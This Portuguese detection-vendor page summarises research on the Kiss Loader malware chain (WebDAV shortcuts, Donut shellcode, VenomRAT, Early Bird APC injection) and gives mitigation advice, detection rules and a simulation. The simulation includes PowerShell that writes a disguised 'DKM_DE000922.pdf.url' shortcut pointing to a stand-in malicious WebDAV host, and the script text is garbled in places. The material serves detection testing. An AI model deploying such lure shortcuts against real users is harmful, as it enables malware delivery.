Quando o Malware Responde: Interação em Tempo Real com um Ameaçador Durante a Análise do Kiss Loader
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Pesquisa por G DATA Security Center examina um carregador recém-identificado chamado Kiss Loader. O artigo examina um carregador recém-identificado chamado Kiss Loader, distribuído através de um atalho do Windows que aponta para um repositório WebDAV exposto por meio de um túnel TryCloudflare. Uma vez iniciado, o carregador decifra o shellcode gerado pelo Donut, recupera cargas úteis como VenomRAT e um componente Kryptik, e os executa através da injeção Early Bird APC no explorer.exe. Durante a análise, o pesquisador experimentou interação direta com o operador do malware através de uma janela do Notepad, o que confirmou o uso do método de injeção Early Bird. O caso ressalta a rápida evolução da ferramenta e a necessidade de forte contenção ao lidar com malware ativo.
Investigação
Pesquisadores detonaram o atalho inicial em um laboratório controlado e rastrearam a cadeia de execução através de um script WSH, componente JScript, arquivos em lote e um carregador baseado em Python. Eles confirmaram o uso do shellcode gerado pelo Donut, extraíram as cargas embutidas e documentaram o método final de injeção, que enfileira um APC em um explorer.exe processo suspenso. Durante a sessão, a equipe capturou uma saída detalhada em tempo de execução e mensagens de desenvolvedores deixadas dentro do fluxo do malware. Uma breve troca em tempo real com o operador confirmou ainda mais tanto a técnica quanto o estado de desenvolvimento ativo do carregador.
Mitigação
As organizações devem restringir ou inspecionar o tráfego WebDAV entregue por meio de plataformas de tunelamento público como o TryCloudflare, desabilitar a execução automática de .url arquivos de atalho e aplicar controles rigorosos de execução a scripts e arquivos em lote em caminhos de inicialização acessíveis ao usuário. As defesas de endpoints devem detectar o comportamento de injeção Early Bird APC e observar processos suspensos recebendo APCs enfileirados. Listas de permissão de aplicativos também devem ser mantidas atualizadas para bloquear carregadores Python desconhecidos e shellcodes baseados em Donut.
Resposta
Se a atividade do Kiss Loader for detectada, isole o endpoint imediatamente, termine quaisquer explorer.exe processos suspeitos iniciados em estado suspenso e capture a memória para revisão forense. Os investigadores devem identificar e bloquear a infraestrutura WebDAV relacionada, escanear o host em busca de VenomRAT, Kryptik e quaisquer cargas adicionais lançadas, e rotacionar credenciais potencialmente expostas. O registro deve então ser revisado para outras tentativas de intrusão, e as regras de detecção devem ser atualizadas com todos os indicadores recém-observados.
Fluxo de Ataque
Detecções
Abuso Possível do Protocolo de Manipulador de URI Search / Search-MS (via linha de comando)
Ver
Arquivo de Atalho da Internet Com Extensão Dupla Foi Criado (via evento de arquivo)
Ver
LOLBAS WScript / CScript (via criação de processo)
Ver
IOCs (HashSha256) para detectar: Quando Malware Responde: Interação em Tempo Real com um Ator de Ameaças Durante a Análise do Kiss Loader
Ver
Injeção Early Bird APC no Explorer.exe [Criação de Processo do Windows]
Ver
Tentativa de Acesso Inicial via Arquivos de Atalho WebDAV [Evento de Arquivo do Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação Pré-voo de Telemetria e Base deve ter passado.
-
Narrativa e Comandos de Ataque:
Um atacante com acesso limitado à estação de trabalho da vítima deseja estabelecer uma posição inicial para movimento lateral. Eles criam um atalho da Internet do Windows malicioso chamado DKM_DE000922.pdf.url que aponta para um compartilhamento WebDAV malicioso (http://malicious.example.com/webdav/evil.pdf). Quando um usuário clica duas vezes no atalho, o sistema tenta automaticamente montar o recurso WebDAV, fazendo com que a vítima baixe a carga útil sem executar um binário tradicional. A criação deste atalho gera um evento de criação de arquivo que corresponde à regra de detecção.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # Caminho onde o atalho será colocado (por exemplo, a Área de Trabalho do usuário) $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # Conteúdo do arquivo .url malicioso apontando para um compartilhamento WebDAV $maliciousContent = @"# Escreva o arquivo – esta ação deve acionar a regra de detecção Set-Content -Path $maliciousPath -Value $maliciousContent -Encoding ASCII -
Script de Teste de Regressão: O script abaixo reproduz exatamente as etapas necessárias para gerar a telemetria que aciona a detecção.
[InternetShortcut] URL=http://malicious.example.com/webdav/evil.pdf IconFile=%SystemRoot%system32shell32.dll IconIndex=0 “@powershell # --------------------------------------------------------- # Teste de Regressão – Acionar regra Sigma para arquivos .url WebDAV # --------------------------------------------------------- # 1. Defina a localização de destino (área de trabalho para o usuário atual) $targetFile = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" # 2. Construa o conteúdo do atalho malicioso $urlPayload = @"# 3. Escreva o atalho (isso disparará um evento FileCreate) Set-Content -Path $targetFile -Value $urlPayload -Encoding ASCII Write-Host "Atalho malicioso .url criado em $targetFile" -
Comandos de Limpeza: Remova o atalho malicioso após a verificação.
powershell $maliciousPath = "$env:USERPROFILEDesktopDKM_DE000922.pdf.url" if (Test-Path $maliciousPath) { Remove-Item -Path $maliciousPath -Force Write-Host "Atalho malicioso limpo." } else { Write-Host "Nenhum atalho malicioso encontrado; nada a limpar." }